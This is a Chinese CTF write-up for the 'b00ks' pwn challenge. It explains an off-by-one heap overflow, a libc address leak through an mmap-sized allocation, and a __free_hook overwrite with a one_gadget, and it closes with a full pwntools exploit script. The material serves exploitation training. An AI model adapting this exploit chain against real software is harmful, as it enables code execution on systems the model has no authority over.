2016_b00ks
off-by-one漏洞原理
边界的检查不够严谨,或者写入的size正好就只多了一个字节
这题呢,函数这里循环了33次,导致了一个字节的溢出
查看数据,off_202010保存的是off_202060的地址,off_202060是保存book的地址,off_202018保存的是 author name ,要清楚这几者之间的关系。
第一步
写入作者名字,申请book堆块,第一个堆块是书名,第二个堆块是书内容
sla("name: ",b"a"*0x20)
add(0xd0,b"a"*8,0x20,b"a"*8)
add(0x21000,b"a"*8,0x21000,b"a"*8)
解释一下,这里有两个问题
- book1 为什么选择书名 size 是 0xd0(我的是0xd0,每个人可能不一样,根据实际情况修改)
- book2 为什么 size 都是 0x21000
当触发off-by-one,book1 的地址 0x000055ab43397130 —> 0x000055ab43397100,正好是书内容地址,所以可以构造fake chunk
申请0x21000的主要目的就是为了泄露libc基地址,只有申请接近或超过top_chunk的size大小的空间,使得堆以mmap的形式进行扩展,那么mmap申请的这个空间会以单独的段形式表示。
第二步
作者名和book1地址连接在一起,打印书籍就可以泄露book1的地址
show()
ru(b"a"*0x20)
book1_addr = uu64()
第三步
在书内容块构造fake chunk,写入 book2 的书名地址和内容地址,并且触发off-by-one,修改 book1 的地址
payload = p64(0x1) + p64(book1_addr+0x38) + p64(book1_addr+0x40) + p64(0xffff)
edit(1,payload)
change(b"a"*0x20)
第四步
泄露book结构体的地址
show()
ru("Name: ")
leak_addr = uu64()
libc_base = leak_addr - 0x5af010
leak_addr - libc_base = 0x00007fe0b632d010 - 0x7fe0b5d7e000 = 0x5af010
第五步
把 book1 的内容地址(也就是book2的内容地址)修改为 free_hook,free_hook 修改为 one_gadget
free_hook = libc.sym["__free_hook"]+libc_base
lg("free_hook")
one_gadget = libc_base + 0x4527a
edit(1,p64(free_hook))
edit(2,p64(one_gadget))
本地是可以打通的,远程它就卡在delete(2)
from pwn import *
binary = "./b00ks"
elf = ELF(binary)
libc = elf.libc
ip = 'node4.buuoj.cn'
port = 25610
local = 1
if local:
io = process(binary)
else:
io = remote(ip, port)
#context.log_level = "debug"
def debug():
gdb.attach(io)
pause()
s = lambda data : io.send(data)
sl = lambda data : io.sendline(data)
sa = lambda text, data : io.sendafter(text, data)
sla = lambda text, data : io.sendlineafter(text, data)
r = lambda : io.recv()
ru = lambda text : io.recvuntil(text)
p = lambda : print(io.recv())
uu32 = lambda : u32(io.recvuntil(b"\xff")[-4:].ljust(4, b'\x00'))
uu64 = lambda : u64(io.recv(6).ljust(8, b"\x00"))
lg = lambda data : io.success('%s -> 0x%x' % (data, eval(data)))
ia = lambda : io.interactive()
_flags = 0xfbad1800
def menu(n):
sla(b'> ', str(n))
def add(nsize,name,dsize,desc):
menu(1)
sla("name size: ",str(nsize))
sla("name (Max 32 chars): ",name)
sla("description size: ",str(dsize))
sla("description: ",desc)
def delete(idx):
menu(2)
sla("delete: ",str(idx))
def edit(idx,con):
menu(3)
sla("edit: ",str(idx))
sla("description: ",con)
def show():
menu(4)
def change(name):
menu(5)
sla("name: ",name)
sla("name: ",b"a"*0x20)
add(0xd0,b"a"*8,0x20,b"a"*8)
add(0x21000,b"a"*8,0x21000,b"a"*8)
#debug()
show()
ru(b"a"*0x20)
book1_addr = uu64()
book2_addr = book1_addr + 0x30
lg("book1_addr")
lg("book2_addr")
#debug()
payload = p64(0x1) + p64(book1_addr+0x38) + p64(book1_addr+0x40) + p64(0xffff)
edit(1,payload)
change(b"a"*0x20)
#debug()
show()
ru("Name: ")
leak_addr = uu64()
libc_base = leak_addr - 0x5af010
lg("leak_addr")
lg("libc_base")
#debug()
free_hook = libc.sym["__free_hook"]+libc_base
lg("free_hook")
gadget=[0x45226,0x4527a,0xf03a4,0xf1247]
one_gadget = libc_base + gadget[1]
edit(1,p64(free_hook))
edit(2,p64(one_gadget))
#debug()
delete(2)
ia()